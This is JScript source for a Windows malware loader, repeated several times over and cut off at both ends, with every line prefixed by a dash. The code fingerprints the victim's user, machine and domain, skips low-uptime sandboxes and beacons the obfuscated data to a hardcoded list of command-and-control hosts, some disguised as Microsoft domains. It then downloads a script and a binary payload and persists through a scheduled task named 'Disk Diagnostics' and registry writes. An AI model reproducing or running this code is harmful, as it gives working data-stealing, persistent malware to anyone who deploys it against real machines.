- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
